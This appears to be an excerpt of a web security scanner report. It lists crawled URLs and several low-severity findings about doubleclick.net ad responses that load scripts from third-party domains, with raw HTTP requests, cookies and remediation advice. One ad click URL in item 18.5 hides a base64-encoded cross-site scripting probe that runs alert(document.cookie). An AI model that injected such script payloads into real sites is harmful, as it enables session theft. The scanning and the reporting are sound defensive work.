http://www.millenniumhotels.co.uk/copthorneplymouth/index.html
http://www.millenniumhotels.co.uk/copthornereading/index.html
http://www.millenniumhotels.co.uk/copthornesheffield/index.html
http://www.millenniumhotels.co.uk/copthornesloughwindsor/index.html
http://www.millenniumhotels.co.uk/copthornetarakensington/index.html
http://www.millenniumhotels.co.uk/index.html
http://www.millenniumhotels.co.uk/millenniumcopthornechelseafc/index.html
http://www.millenniumhotels.co.uk/millenniumglasgow/index.html
http://www.millenniumhotels.co.uk/millenniumgloucester/index.html
http://www.millenniumhotels.co.uk/millenniumkensington/index.html
http://www.millenniumhotels.co.uk/millenniumknightsbridge/index.html
http://www.millenniumhotels.co.uk/millenniummayfair/index.html
http://www.millenniumhotels.co.uk/millenniumreading/index.html
http://www.millenniumhotels.com/
http://www.millenniumhotels.com/ae/copthornehoteldubai/index.html
http://www.millenniumhotels.com/ae/grandmillenniumalwahda/index.html
http://www.millenniumhotels.com/ae/grandmillenniumdubai/index.html
http://www.millenniumhotels.com/ae/kingsgateabudhabi/index.html
http://www.millenniumhotels.com/ae/millenniumabudhabi/index.html
http://www.millenniumhotels.com/ae/millenniumdubai/index.html
http://www.millenniumhotels.com/cn/copthorneqingdao/index.html
http://www.millenniumhotels.com/cn/grandmillenniumbeijing/index.html
http://www.millenniumhotels.com/cn/millenniumchengdu/index.html
http://www.millenniumhotels.com/cn/millenniumshanghai/index.html
http://www.millenniumhotels.com/cn/millenniumwuxi/index.html
http://www.millenniumhotels.com/cn/millenniumxiamen/index.html
http://www.millenniumhotels.com/corporate/contact_us/enquiriesReservation.html
http://www.millenniumhotels.com/corporate/faq/faq.html
http://www.millenniumhotels.com/corporate/hotels/copthorneHotels.html
http://www.millenniumhotels.com/corporate/hotels/hotelsMillennium.html
http://www.millenniumhotels.com/corporate/index.html
http://www.millenniumhotels.com/corporate/investor_relations/financialLibrary.html
http://www.millenniumhotels.com/corporate/legalInfo.html
http://www.millenniumhotels.com/corporate/privacyPolicy.html
http://www.millenniumhotels.com/corporate/siteMap.html
http://www.millenniumhotels.com/corporate/termsConditions.html
http://www.millenniumhotels.com/de/copthornehannover/index.html
http://www.millenniumhotels.com/de/millenniumstuttgart/index.html
http://www.millenniumhotels.com/fr/millenniumcharlesdegaulle/index.html
http://www.millenniumhotels.com/fr/millenniumparis/index.html
http://www.millenniumhotels.com/id/millenniumjakarta/index.html
http://www.millenniumhotels.com/index.html
http://www.millenniumhotels.com/kw/aljahrahcopthornekuwait/index.html
http://www.millenniumhotels.com/millenniumanchorage/index.html
http://www.millenniumhotels.com/millenniumboston/attractions/
http://www.millenniumhotels.com/millenniumboston/attractions/Green_Policy.html
http://www.millenniumhotels.com/millenniumboston/attractions/Logan_International_Airport.html
http://www.millenniumhotels.com/millenniumboston/attractions/index.html
http://www.millenniumhotels.com/millenniumboston/contactus/index.html
http://www.millenniumhotels.com/millenniumboston/facilities/
http://www.millenniumhotels.com/millenniumboston/facilities/index.html
http://www.millenniumhotels.com/millenniumboston/forms/optInForm.html
http://www.millenniumhotels.com/millenniumboston/gallery/index.html
http://www.millenniumhotels.com/millenniumboston/index.html
http://www.millenniumhotels.com/millenniumboston/meeting/index.html
http://www.millenniumhotels.com/millenniumboston/news/index.html
http://www.millenniumhotels.com/millenniumboston/restaurant/
http://www.millenniumhotels.com/millenniumboston/restaurant/index.html
http://www.millenniumhotels.com/millenniumboston/rooms/
http://www.millenniumhotels.com/millenniumboston/rooms/index.html
http://www.millenniumhotels.com/millenniumboston/rooms/suite.html
http://www.millenniumhotels.com/millenniumboston/specials/index.html
http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html
http://www.millenniumhotels.com/millenniumboulder/index.html
http://www.millenniumhotels.com/millenniumbuffalo/index.html
http://www.millenniumhotels.com/millenniumchicago/index.html
http://www.millenniumhotels.com/millenniumcincinnati/index.html
http://www.millenniumhotels.com/millenniumdurham/index.html
http://www.millenniumhotels.com/millenniumlosangeles/index.html
http://www.millenniumhotels.com/millenniumminneapolis/index.html
http://www.millenniumhotels.com/millenniumnashville/index.html
http://www.millenniumhotels.com/millenniumnewyork/index.html
http://www.millenniumhotels.com/millenniumscottsdale/index.html
http://www.millenniumhotels.com/millenniumstlouis/index.html
http://www.millenniumhotels.com/millenniumunplazanewyork/index.html
http://www.millenniumhotels.com/my/copthornepenang/index.html
http://www.millenniumhotels.com/my/millenniumkualalumpur/index.html
http://www.millenniumhotels.com/opening/millenniumveetaichung.html
http://www.millenniumhotels.com/ph/heritagemanila/index.html
http://www.millenniumhotels.com/premierhotelnewyork/index.html
http://www.millenniumhotels.com/qa/millenniumdoha/index.html
http://www.millenniumhotels.com/th/grandmillenniumsukhumvitbangkok/index.html
http://www.millenniumhotels.com/th/millenniumpatongphuket/index.html
http://www.millenniumhotels.com.cn/
http://www.millenniumhotels.com.sg/
http://www.millenniumhotels.com.sg/StudioMHotel/index.html
http://www.millenniumhotels.com.sg/copthornekingssingapore/index.html
http://www.millenniumhotels.com.sg/copthorneorchidsingapore/index.html
http://www.millenniumhotels.com.sg/grandcopthornewaterfront/index.html
http://www.millenniumhotels.com.sg/mhotelsingapore/index.html
http://www.millenniumhotels.com.sg/orchardhotelsingapore/index.html
http://www.montanaplates.com/
http://www.montanaplates.com/747natoma.html
http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
http://www.montanaplates.com/index-2.html
http://www.montanaplates.com/onlineshoppingempire.html
http://www.montanaplates.com/privacy.html
http://www.msn.com/
http://www.msn.com/defaultwpe7.aspx
http://www.msn.com/sck.aspx
http://www.msn.com/worldwide.aspx
http://www.msnbc.msn.com/
http://www.msnbc.msn.com/id/3032072/ns/business
http://www.msnbc.msn.com/id/3032076/ns/health
http://www.msnbc.msn.com/id/3032118/ns/technology_and_science
http://www.msnbc.msn.com/id/3032507/ns/world_news
http://www.msnbc.msn.com/id/3032525/ns/us_news
http://www.msnbc.msn.com/id/3032553/ns/politics
http://www.msnbc.msn.com/id/3032619/ns/nightly_news/
http://www.msnbc.msn.com/id/41274431/ns/world_news-weird_news/
http://www.msnbc.msn.com/id/41292533/ns/technology_and_science-science/
http://www.msnbc.msn.com/id/41299984/ns/health-cancer/from/toolbar
http://www.msnbc.msn.com/id/41354775/ns/business-business_of_super_bowl_xlv/
http://www.msnbc.msn.com/id/41357424/ns/health-kids_and_parenting
http://www.msnbc.msn.com/id/41359879/ns/us_news-life/
http://www.msnbc.msn.com/id/41360579/ns/us_news-crime_and_courts
http://www.msnbc.msn.com/id/41362386/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.msn.com/id/41362578/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.msn.com/id/41363059/ns/local_news-dallasfort_worth_tx/
http://www.msnbc.msn.com/id/41363738/ns/weather
http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/
http://www.msnbc.msn.com/id/41364449/ns/world_news-the_new_york_times
http://www.msnbc.msn.com/id/41365053
http://www.msnbc.msn.com/id/41365053/ns/weather/
http://www.msnbc.msn.com/id/41366134/ns/world_news-mideastn_africa
http://www.msnbc.msn.com/id/41367374/ns/world_news-europe
http://www.mygadgetsblog.info/
http://www.mywot.com/en/scorecard/2mdn.net
http://www.no-margin-for-errors.com/
http://www.nolanfans.com/
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.orbitz.com/
http://www.orbitz.com/
http://www.orbitz.com/
http://www.orbitz.com/App/DPTLandingPageSearch
http://www.orbitz.com/App/DisplayCarSearch
http://www.orbitz.com/App/DisplayCarSearch
http://www.orbitz.com/App/GDDC
http://www.orbitz.com/App/GDDC
http://www.orbitz.com/App/Home
http://www.orbitz.com/App/Home
http://www.orbitz.com/App/InitDealEdit
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PerformMDLPDealsContent
http://www.orbitz.com/App/PrepareActivitiesHome
http://www.orbitz.com/App/PrepareDealsHome
http://www.orbitz.com/App/PrepareFlightsTab
http://www.orbitz.com/App/PrepareSearchResult
http://www.orbitz.com/App/PrepareVacationsHome
http://www.orbitz.com/App/Sitemap
http://www.orbitz.com/App/SubmitQuickSearch
http://www.orbitz.com/App/ViewRSSHelpPage
http://www.orbitz.com/App/ViewRSSHelpPage
http://www.orbitz.com/App/ViewRoundTripSearch
http://www.orbitz.com/App/ViewRoundTripSearch
http://www.orbitz.com/App/ViewRoundTripSearch
http://www.orbitz.com/hotels/
http://www.orbitz.com/hotels/Canada--ON/Toronto/
http://www.orbitz.com/hotels/France/Nice/
http://www.orbitz.com/hotels/France/Paris/
http://www.orbitz.com/hotels/Mexico/
http://www.orbitz.com/hotels/Mexico/Cancun/
http://www.orbitz.com/hotels/Mexico/Playa_Del_Carmen/
http://www.orbitz.com/hotels/United_Kingdom/London/
http://www.orbitz.com/hotels/United_States--CA/Los_Angeles/
http://www.orbitz.com/hotels/United_States--CA/San_Diego/
http://www.orbitz.com/hotels/United_States--CA/San_Francisco/
http://www.orbitz.com/hotels/United_States--FL/Miami/
http://www.orbitz.com/hotels/United_States--FL/Orlando/
http://www.orbitz.com/hotels/United_States--IL/Chicago/
http://www.orbitz.com/hotels/United_States--NV/Las_Vegas/
http://www.orbitz.com/hotels/United_States--NY/New_York/
http://www.orbitz.com/shop/hotelsearch
https://www.orbitz.com/Secure/SignIn
https://www.orbitz.com/account/login
https://www.orbitz.com/account/registration
https://www.orbitz.com/trips/writeReview
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
http://www.oyster.com/boston/hotels/millennium-bostonian/
http://www.pctools.com/
http://www.pctools.com/firewall/
http://www.pctools.com/free-antivirus/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/spyware-doctor/
http://www.plentyoffish.com/
http://www.plentyoffish.com/basicsearch.aspx
http://www.plentyoffish.com/member1242943.htm
http://www.plentyoffish.com/member16373418.htm
http://www.plentyoffish.com/member19992238.htm
http://www.plentyoffish.com/member22529971.htm
http://www.plentyoffish.com/member22970699.htm
http://www.plentyoffish.com/member23010679.htm
http://www.plentyoffish.com/member23031204.htm
http://www.plentyoffish.com/member23817184.htm
http://www.plentyoffish.com/member24663198.htm
http://www.plentyoffish.com/member24778333.htm
http://www.plentyoffish.com/member25294614.htm
http://www.plentyoffish.com/member25300504.htm
http://www.plentyoffish.com/member25401489.htm
http://www.plentyoffish.com/member25429166.htm
http://www.plentyoffish.com/register.aspx
http://www.plentyoffish.com/suggestions_v2.aspx
http://www.plentyoffish.com/terms.aspx
http://www.ppcse.net/
http://www.proxyhelp.net/
http://www.ratedesi.com/
http://www.revresda.com/html.ng/adsize=160x160&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.revresda.com/html.ng/adsize=728x90&pos=top&Section=results&channel=hotel&tile=1296573846143&refUrl=http:/www.orbitz.com/&location=US&secure=false&state=MA&searchType=hotel&CookieName=PRO2&aboveThreshold=true&currency=USD&city=BOSTON&passengers=a&search=Search&hotelSearchType=keyword&site=orbitz&platform=austin&numberOfAdultsRoom1=1&numberOfAdultsRoom0=2&numberOfAdultsRoom3=1&numberOfAdultsRoom2=1&hotelCheckOutDate=2/2/11&numberOfRooms=1&hotelCheckInDate=2/1/11&m=0&country=US&v=173.193.214.243-3953790720.30125555&dest=BOSTON&subdomain=orbitz&language=en_US
http://www.robtex.com/as/as36621.html
http://www.robtex.com/dns/
http://www.robtex.com/dns/google.com.html
http://www.robtex.com/dns/net.html
http://www.robtex.com/dns/ns1.google.com.html
http://www.robtex.com/ext/ads/nb728.html
http://www.robtex.com/ext/ads/nt728.html
http://www.robtex.com/faq.html
http://www.scmagazineus.com/search/xss/
http://www.shape.com/workouts/articles/blood_sugar.html
http://www.shape.com/workouts/articles/workout_schedule.html
http://www.stocktrader.org.uk/remote2/ST1-2.php
http://www.stocktrader.org.uk/widgets/stock-trader-scroller-1.html
http://www.techmynd.com/cross-site-scripting-attacks-xss/
http://www.thefreedomtrail.org/
http://www.theroot.com/multimedia/50-years-black-history
http://www.theroot.com/views/2011/young-futurists
http://www.theroot.com/views/meet-25-people-who-will-change-our-world
http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/
http://www.theworkbuzz.com/employment-trends/video-interviews/
http://www.threatexpert.com/
http://www.threatexpert.com/azlisting.aspx
http://www.threatexpert.com/catlisting.aspx
http://www.threatexpert.com/contact.aspx
http://www.threatexpert.com/default.aspx
http://www.threatexpert.com/files/a.exe.html
http://www.threatexpert.com/files/b.exe.html
http://www.threatexpert.com/files/c.exe.html
http://www.threatexpert.com/files/msa.exe.html
http://www.threatexpert.com/files/msxml71.dll.html
http://www.threatexpert.com/filescan.aspx
http://www.threatexpert.com/introduction.aspx
http://www.threatexpert.com/map.aspx
http://www.threatexpert.com/memoryscanner.aspx
http://www.threatexpert.com/overview.aspx
http://www.threatexpert.com/report.aspx
http://www.threatexpert.com/reports.aspx
http://www.threatexpert.com/sescan.aspx
http://www.threatexpert.com/signin.aspx
http://www.threatexpert.com/signup.aspx
http://www.threatexpert.com/submissionapplet.aspx
http://www.threatexpert.com/submit.aspx
http://www.threatexpert.com/threats.aspx
http://www.threatexpert.com/threats/adware-bho-gen.html
http://www.threatexpert.com/threats/trojan-fakealert.html
http://www.trip.com/
http://www.ufc.com/
http://www.unitware.com/
http://www.veracode.com/security/xss
http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/
http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html
http://www.webveteran.com/
http://www.wirelessmicrophone.info/
http://www.wirelessprinter.info/
http://www.wizzsurf.com/
http://www.worldmastiffforum.com/
http://www.xss.com/
http://www.xssed.com/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

18.1. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=39601754&c5=57234521&c6=&
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

18.2. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=40150110&c5=57234521&c6=&
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

18.3. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=39601731&c5=57234521&c6=&
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

18.4. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/adi/N5506.150290.INVITEMEDIA/B5070033.24

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=&
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

18.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.91

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
